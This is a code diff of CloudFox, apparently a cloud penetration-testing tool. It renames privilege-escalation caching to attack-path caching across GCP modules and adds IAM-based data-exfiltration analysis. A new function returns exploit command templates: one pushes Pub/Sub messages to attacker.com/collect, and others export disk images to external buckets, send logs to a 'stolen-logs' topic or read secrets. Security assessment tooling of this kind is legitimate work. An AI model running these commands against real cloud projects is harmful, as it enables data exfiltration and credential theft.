all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) @@ -470,7 +470,7 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou // Services table servicesHeader := []string{ "Project ID", "Project Name", "Name", "Region", "URL", "Ingress", "Public", - "Invokers", "Service Account", "Priv Esc", "Default SA", "Image", "VPC Access", + "Invokers", "Service Account", "Attack Paths", "Default SA", "Image", "VPC Access", "Min/Max", "Env Vars", "Secrets", "Hardcoded", } @@ -510,20 +510,20 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou hardcoded = fmt.Sprintf("Yes (%d)", len(svc.HardcodedSecrets)) } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if svc.ServiceAccount != "" { - privEsc = m.PrivescCache.GetPrivescSummary(svc.ServiceAccount) + attackPaths = m.AttackPathCache.GetAttackSummary(svc.ServiceAccount) } else { - privEsc = "No" + attackPaths = "No" } } servicesBody = append(servicesBody, []string{ svc.ProjectID, m.GetProjectName(svc.ProjectID), svc.Name, svc.Region, svc.URL, formatIngress(svc.IngressSettings), publicStatus, invokers, svc.ServiceAccount, - privEsc, defaultSA, svc.ContainerImage, vpcAccess, scaling, envVars, secrets, hardcoded, + attackPaths, defaultSA, svc.ContainerImage, vpcAccess, scaling, envVars, secrets, hardcoded, }) } @@ -537,7 +537,7 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou // Jobs table jobsHeader := []string{ - "Project ID", "Project Name", "Name", "Region", "Service Account", "Priv Esc", "Default SA", + "Project ID", "Project Name", "Name", "Region", "Service Account", "Attack Paths", "Default SA", "Image", "Tasks", "Parallelism", "Last Execution", "Env Vars", "Secrets", "Hardcoded", } @@ -565,19 +565,19 @@ func (m *CloudRunModule) buildTablesForProject(projectID string, services []Clou lastExec = extractName(job.LastExecution) } - // Check privesc for the service account - jobPrivEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + jobAttackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if job.ServiceAccount != "" { - jobPrivEsc = m.PrivescCache.GetPrivescSummary(job.ServiceAccount) + jobAttackPaths = m.AttackPathCache.GetAttackSummary(job.ServiceAccount) } else { - jobPrivEsc = "No" + jobAttackPaths = "No" } } jobsBody = append(jobsBody, []string{ job.ProjectID, m.GetProjectName(job.ProjectID), job.Name, job.Region, - job.ServiceAccount, jobPrivEsc, defaultSA, job.ContainerImage, + job.ServiceAccount, jobAttackPaths, defaultSA, job.ContainerImage, fmt.Sprintf("%d", job.TaskCount), fmt.Sprintf("%d", job.Parallelism), lastExec, envVars, secrets, hardcoded, }) diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index d00d31e7..6814cdf7 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -32,7 +32,7 @@ type ComposerModule struct { gcpinternal.BaseGCPModule ProjectEnvironments map[string][]composerservice.EnvironmentInfo // projectID -> environments LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -59,8 +59,8 @@ func runGCPComposerCommand(cmd *cobra.Command, args []string) { } func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) @@ -182,7 +182,7 @@ func (m *ComposerModule) getTableHeader() []string { "Location", "State", "Service Account", - "Priv Esc", + "Attack Paths", "Private", "Private Endpoint", "Airflow URI", @@ -199,13 +199,13 @@ func (m *ComposerModule) environmentsToTableBody(environments []composerservice. sa = "(default)" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { - privEsc = m.PrivescCache.GetPrivescSummary(sa) + attackPaths = m.AttackPathCache.GetAttackSummary(sa) } else { - privEsc = "No" + attackPaths = "No" } } @@ -231,7 +231,7 @@ func (m *ComposerModule) environmentsToTableBody(environments []composerservice. env.Location, env.State, sa, - privEsc, + attackPaths, boolToYesNo(env.PrivateEnvironment), boolToYesNo(env.EnablePrivateEndpoint), airflowURI, diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 3e9a06c4..a7109d38 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -6,6 +6,7 @@ import ( "strings" "sync" + attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" @@ -119,19 +120,32 @@ type MissingHardening struct { Recommendation string // How to enable it } +// PermissionBasedExfilPath represents an exfiltration capability based on IAM permissions +type PermissionBasedExfilPath struct { + Principal string // Who has this capability + PrincipalType string // user, serviceAccount, group + ProjectID string // Project where permission exists + Permission string // The dangerous permission + Category string // Category of exfiltration + RiskLevel string // CRITICAL, HIGH, MEDIUM + Description string // What this enables + ExploitCommand string // Command to exploit +} + // ------------------------------ // Module Struct // ------------------------------ type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths - ProjectPotentialVectors map[string][]PotentialVector // projectID -> vectors - ProjectPublicExports map[string][]PublicExport // projectID -> exports - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex - vpcscProtectedProj map[string]bool // Projects protected by VPC-SC - orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths + ProjectPotentialVectors map[string][]PotentialVector // projectID -> vectors + ProjectPublicExports map[string][]PublicExport // projectID -> exports + ProjectPermissionBasedExfil map[string][]PermissionBasedExfilPath // projectID -> permission-based paths + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project } // ------------------------------ @@ -155,13 +169,14 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { } module := &DataExfiltrationModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), - ProjectPotentialVectors: make(map[string][]PotentialVector), - ProjectPublicExports: make(map[string][]PublicExport), - LootMap: make(map[string]map[string]*internal.LootFile), - vpcscProtectedProj: make(map[string]bool), - orgPolicyProtection: make(map[string]*OrgPolicyProtection), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), + ProjectPotentialVectors: make(map[string][]PotentialVector), + ProjectPublicExports: make(map[string][]PublicExport), + ProjectPermissionBasedExfil: make(map[string][]PermissionBasedExfilPath), + LootMap: make(map[string]map[string]*internal.LootFile), + vpcscProtectedProj: make(map[string]bool), + orgPolicyProtection: make(map[string]*OrgPolicyProtection), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) @@ -194,6 +209,14 @@ func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { return all } +func (m *DataExfiltrationModule) getAllPermissionBasedExfil() []PermissionBasedExfilPath { + var all []PermissionBasedExfilPath + for _, paths := range m.ProjectPermissionBasedExfil { + all = append(all, paths...) + } + return all +} + func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) @@ -203,6 +226,9 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo // Check organization policy protections for all projects m.checkOrgPolicyProtection(ctx, logger) + // Analyze org and folder level exfil paths (runs once for all projects) + m.analyzeOrgFolderExfilPaths(ctx, logger) + // Process each project m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) @@ -211,9 +237,10 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo allPaths := m.getAllExfiltrationPaths() allVectors := m.getAllPotentialVectors() + allPermBasedPaths := m.getAllPermissionBasedExfil() // Check results - hasResults := len(allPaths) > 0 || len(allVectors) > 0 || len(hardeningRecs) > 0 + hasResults := len(allPaths) > 0 || len(allVectors) > 0 || len(hardeningRecs) > 0 || len(allPermBasedPaths) > 0 if !hasResults { logger.InfoM("No data exfiltration paths, vectors, or hardening gaps found", GCP_DATAEXFILTRATION_MODULE_NAME) @@ -226,6 +253,9 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo if len(allVectors) > 0 { logger.SuccessM(fmt.Sprintf("Found %d potential exfiltration vector(s)", len(allVectors)), GCP_DATAEXFILTRATION_MODULE_NAME) } + if len(allPermBasedPaths) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d permission-based exfiltration path(s)", len(allPermBasedPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + } if len(hardeningRecs) > 0 { logger.InfoM(fmt.Sprintf("Found %d hardening recommendation(s)", len(hardeningRecs)), GCP_DATAEXFILTRATION_MODULE_NAME) } @@ -233,6 +263,71 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo m.writeOutput(ctx, logger) } +// analyzeOrgFolderExfilPaths analyzes organization and folder level IAM for exfil permissions +func (m *DataExfiltrationModule) analyzeOrgFolderExfilPaths(ctx context.Context, logger internal.Logger) { + attackSvc := attackpathservice.New() + + // Analyze organization-level IAM + orgPaths, orgNames, _, err := attackSvc.AnalyzeOrganizationAttackPaths(ctx, "exfil") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze organization-level exfil paths") + } + } else if len(orgPaths) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization-level exfil path(s)", len(orgPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + for _, path := range orgPaths { + orgName := orgNames[path.ScopeID] + if orgName == "" { + orgName = path.ScopeID + } + exfilPath := PermissionBasedExfilPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: "org:" + path.ScopeID, + Permission: path.Method, + Category: path.Category + " (Org: " + orgName + ")", + RiskLevel: "CRITICAL", // Org-level is critical + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + // Store under a special "organization" key + m.mu.Lock() + m.ProjectPermissionBasedExfil["organization"] = append(m.ProjectPermissionBasedExfil["organization"], exfilPath) + m.mu.Unlock() + } + } + + // Analyze folder-level IAM + folderPaths, folderNames, err := attackSvc.AnalyzeFolderAttackPaths(ctx, "exfil") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze folder-level exfil paths") + } + } else if len(folderPaths) > 0 { + logger.InfoM(fmt.Sprintf("Found %d folder-level exfil path(s)", len(folderPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + for _, path := range folderPaths { + folderName := folderNames[path.ScopeID] + if folderName == "" { + folderName = path.ScopeID + } + exfilPath := PermissionBasedExfilPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: "folder:" + path.ScopeID, + Permission: path.Method, + Category: path.Category + " (Folder: " + folderName + ")", + RiskLevel: "CRITICAL", // Folder-level is critical + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + // Store under a special "folder" key + m.mu.Lock() + m.ProjectPermissionBasedExfil["folder"] = append(m.ProjectPermissionBasedExfil["folder"], exfilPath) + m.mu.Unlock() + } + } +} + // ------------------------------ // VPC-SC Protection Check // ------------------------------ @@ -633,6 +728,11 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s // 14. Check for Logging sink capability m.checkLoggingSinkCapability(ctx, projectID, logger) + + // === PERMISSION-BASED EXFILTRATION CAPABILITIES === + + // 15. Check IAM for principals with data exfiltration permissions + m.findPermissionBasedExfilPaths(ctx, projectID, logger) } // findPublicSnapshots finds snapshots that are publicly accessible @@ -1427,6 +1527,112 @@ gcloud logging sinks update SINK_NAME \ } } +// findPermissionBasedExfilPaths identifies principals with data exfiltration permissions +// This now uses the centralized attackpathService for project-level analysis only +// Org/folder/resource level analysis is done separately in findAllLevelExfilPaths +func (m *DataExfiltrationModule) findPermissionBasedExfilPaths(ctx context.Context, projectID string, logger internal.Logger) { + // Use attackpathService for project-level analysis + attackSvc := attackpathservice.New() + + projectName := m.GetProjectName(projectID) + paths, err := attackSvc.AnalyzeProjectAttackPaths(ctx, projectID, projectName, "exfil") + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not analyze exfil permissions for project %s", projectID)) + return + } + + // Convert AttackPath to PermissionBasedExfilPath + for _, path := range paths { + exfilPath := PermissionBasedExfilPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: projectID, + Permission: path.Method, + Category: path.Category, + RiskLevel: "HIGH", // Default risk level + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + + m.mu.Lock() + m.ProjectPermissionBasedExfil[projectID] = append(m.ProjectPermissionBasedExfil[projectID], exfilPath) + m.mu.Unlock() + } + + // Also analyze resource-level IAM + resourcePaths, err := attackSvc.AnalyzeResourceAttackPaths(ctx, projectID, "exfil") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not analyze resource-level exfil permissions for project %s", projectID)) + } + } else { + for _, path := range resourcePaths { + exfilPath := PermissionBasedExfilPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: projectID, + Permission: path.Method, + Category: path.Category + " (Resource: " + path.ScopeName + ")", + RiskLevel: "HIGH", + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + + m.mu.Lock() + m.ProjectPermissionBasedExfil[projectID] = append(m.ProjectPermissionBasedExfil[projectID], exfilPath) + m.mu.Unlock() + } + } +} + +// generateExfilExploitCommand generates an exploit command for a data exfil permission +func (m *DataExfiltrationModule) generateExfilExploitCommand(permission, projectID string) string { + switch permission { + case "compute.images.create": + return fmt.Sprintf(`# Create image from disk (for export) +gcloud compute images create exfil-image --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s +# Export to external bucket +gcloud compute images export --image=exfil-image --destination-uri=gs://EXTERNAL_BUCKET/image.tar.gz --project=%s`, projectID, projectID) + case "compute.snapshots.create": + return fmt.Sprintf(`# Create snapshot from disk (for export) +gcloud compute snapshots create exfil-snapshot --source-disk=DISK_NAME --source-disk-zone=ZONE --project=%s`, projectID) + case "logging.sinks.create": + return fmt.Sprintf(`# Create logging sink to external destination +gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/EXTERNAL_PROJECT/topics/stolen-logs --project=%s`, projectID) + case "cloudsql.instances.export": + return fmt.Sprintf(`# Export Cloud SQL database to GCS +gcloud sql export sql INSTANCE_NAME gs://BUCKET/export.sql --database=DB_NAME --project=%s`, projectID) + case "pubsub.subscriptions.create": + return fmt.Sprintf(`# Create subscription to intercept messages +gcloud pubsub subscriptions create exfil-sub --topic=TOPIC_NAME --push-endpoint=https://attacker.com/collect --project=%s`, projectID) + case "bigquery.tables.export": + return fmt.Sprintf(`# Export BigQuery table to GCS +bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://BUCKET/export.csv`, projectID) + case "storagetransfer.jobs.create": + return fmt.Sprintf(`# Create transfer job to external cloud (requires API) +gcloud transfer jobs create gs://SOURCE_BUCKET s3://DEST_BUCKET --project=%s`, projectID) + case "secretmanager.versions.access": + return fmt.Sprintf(`# Access secret values +gcloud secrets versions access latest --secret=SECRET_NAME --project=%s`, projectID) + default: + return fmt.Sprintf("# Permission: %s\n# Refer to GCP documentation for exploitation", permission) + } +} + +// extractPrincipalType extracts the type from a principal name like "user:email" or "serviceAccount:email" +func extractPrincipalType(principalName string) string { + if strings.HasPrefix(principalName, "user:") { + return "user" + } else if strings.HasPrefix(principalName, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(principalName, "group:") { + return "group" + } + return "unknown" +} + // ------------------------------ // Loot File Management // ------------------------------ diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index 74ff958e..025abe3b 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -32,7 +32,7 @@ type DataflowModule struct { gcpinternal.BaseGCPModule ProjectJobs map[string][]dataflowservice.JobInfo // projectID -> jobs LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -59,8 +59,8 @@ func runGCPDataflowCommand(cmd *cobra.Command, args []string) { } func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) @@ -176,7 +176,7 @@ func (m *DataflowModule) getTableHeader() []string { "State", "Location", "Service Account", - "Priv Esc", + "Attack Paths", "Public IPs", "Workers", } @@ -190,13 +190,13 @@ func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]str publicIPs = "Yes" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if job.ServiceAccount != "" { - privEsc = m.PrivescCache.GetPrivescSummary(job.ServiceAccount) + attackPaths = m.AttackPathCache.GetAttackSummary(job.ServiceAccount) } else { - privEsc = "No" + attackPaths = "No" } } @@ -208,7 +208,7 @@ func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]str job.State, job.Location, job.ServiceAccount, - privEsc, + attackPaths, publicIPs, fmt.Sprintf("%d", job.NumWorkers), }) diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index 51de1966..5d0b0548 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -32,7 +32,7 @@ type DataprocModule struct { gcpinternal.BaseGCPModule ProjectClusters map[string][]dataprocservice.ClusterInfo // projectID -> clusters LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -59,8 +59,8 @@ func runGCPDataprocCommand(cmd *cobra.Command, args []string) { } func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) @@ -184,7 +184,7 @@ func (m *DataprocModule) getTableHeader() []string { "Master Instances", "Workers", "Service Account", - "Priv Esc", + "Attack Paths", "Public IPs", "Kerberos", "Resource Role", @@ -200,13 +200,13 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI sa = "(default)" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { - privEsc = m.PrivescCache.GetPrivescSummary(sa) + attackPaths = m.AttackPathCache.GetAttackSummary(sa) } else { - privEsc = "No" + attackPaths = "No" } } @@ -232,7 +232,7 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI masterInstances, workerConfig, sa, - privEsc, + attackPaths, boolToYesNo(!cluster.InternalIPOnly), boolToYesNo(cluster.KerberosEnabled), binding.Role, @@ -251,7 +251,7 @@ func (m *DataprocModule) clustersToTableBody(clusters []dataprocservice.ClusterI masterInstances, workerConfig, sa, - privEsc, + attackPaths, boolToYesNo(!cluster.InternalIPOnly), boolToYesNo(cluster.KerberosEnabled), "-", diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index 7c99dd80..f17cf6f6 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -55,7 +55,7 @@ type FunctionsModule struct { // Module-specific fields - per-project for hierarchical output ProjectFunctions map[string][]FunctionsService.FunctionInfo // projectID -> functions LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -92,8 +92,8 @@ func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) @@ -418,7 +418,7 @@ func (m *FunctionsModule) getTableHeader() []string { "Ingress", "Public", "Service Account", - "Priv Esc", + "Attack Paths", "VPC Connector", "Secrets", "Resource Role", @@ -461,13 +461,13 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func serviceAccount = "-" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if serviceAccount != "-" { - privEsc = m.PrivescCache.GetPrivescSummary(serviceAccount) + attackPaths = m.AttackPathCache.GetAttackSummary(serviceAccount) } else { - privEsc = "No" + attackPaths = "No" } } @@ -486,7 +486,7 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func fn.IngressSettings, boolToYesNo(fn.IsPublic), serviceAccount, - privEsc, + attackPaths, vpcConnector, secretsInfo, binding.Role, @@ -507,7 +507,7 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func fn.IngressSettings, boolToYesNo(fn.IsPublic), serviceAccount, - privEsc, + attackPaths, vpcConnector, secretsInfo, "-", diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index 3464da6e..e189d51b 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -62,7 +62,7 @@ type GKEModule struct { ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -100,8 +100,8 @@ func runGCPGKECommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) @@ -373,7 +373,7 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod // Node pools table nodePoolHeader := []string{ "Project Name", "Project ID", "Cluster", "Node Pool", "Machine Type", "Node Count", - "Service Account", "Priv Esc", "Cloud Platform Scope", "Auto Upgrade", "Secure Boot", "Preemptible", + "Service Account", "Attack Paths", "Cloud Platform Scope", "Auto Upgrade", "Secure Boot", "Preemptible", } var nodePoolBody [][]string @@ -383,19 +383,19 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod saDisplay = "-" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if saDisplay != "-" { - privEsc = m.PrivescCache.GetPrivescSummary(saDisplay) + attackPaths = m.AttackPathCache.GetAttackSummary(saDisplay) } else { - privEsc = "No" + attackPaths = "No" } } nodePoolBody = append(nodePoolBody, []string{ m.GetProjectName(np.ProjectID), np.ProjectID, np.ClusterName, np.Name, - np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, privEsc, + np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, attackPaths, boolToYesNo(np.HasCloudPlatformScope), boolToYesNo(np.AutoUpgrade), boolToYesNo(np.SecureBoot), boolToYesNo(np.Preemptible || np.Spot), }) diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index acd53386..fce9c5a1 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -55,7 +55,7 @@ type InstancesModule struct { ProjectInstances map[string][]ComputeEngineService.ComputeEngineInfo // projectID -> instances ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -96,8 +96,8 @@ func runGCPInstancesCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) @@ -552,7 +552,7 @@ func (m *InstancesModule) getInstancesTableHeader() []string { "External IP", "Internal IP", "Service Account", - "Priv Esc", + "Attack Paths", "Scopes", "Default SA", "Broad Scopes", @@ -598,13 +598,13 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if saEmail != "-" { - privEsc = m.PrivescCache.GetPrivescSummary(saEmail) + attackPaths = m.AttackPathCache.GetAttackSummary(saEmail) } else { - privEsc = "No" + attackPaths = "No" } } @@ -637,7 +637,7 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. externalIP, instance.InternalIP, saEmail, - privEsc, + attackPaths, scopes, boolToYesNo(instance.HasDefaultSA), boolToYesNo(instance.HasCloudScopes), diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 59af2e1e..6d3e49cd 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -6,6 +6,7 @@ import ( "strings" "sync" + attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" FunctionsService "github.com/BishopFox/cloudfox/gcp/services/functionsService" @@ -54,25 +55,38 @@ type ImpersonationChain struct { } type TokenTheftVector struct { - ResourceType string // "instance", "function", "cloudrun", etc. - ResourceName string - ProjectID string + ResourceType string // "instance", "function", "cloudrun", etc. + ResourceName string + ProjectID string ServiceAccount string - AttackVector string // "metadata", "env_var", "startup_script", etc. - RiskLevel string + AttackVector string // "metadata", "env_var", "startup_script", etc. + RiskLevel string ExploitCommand string } +// 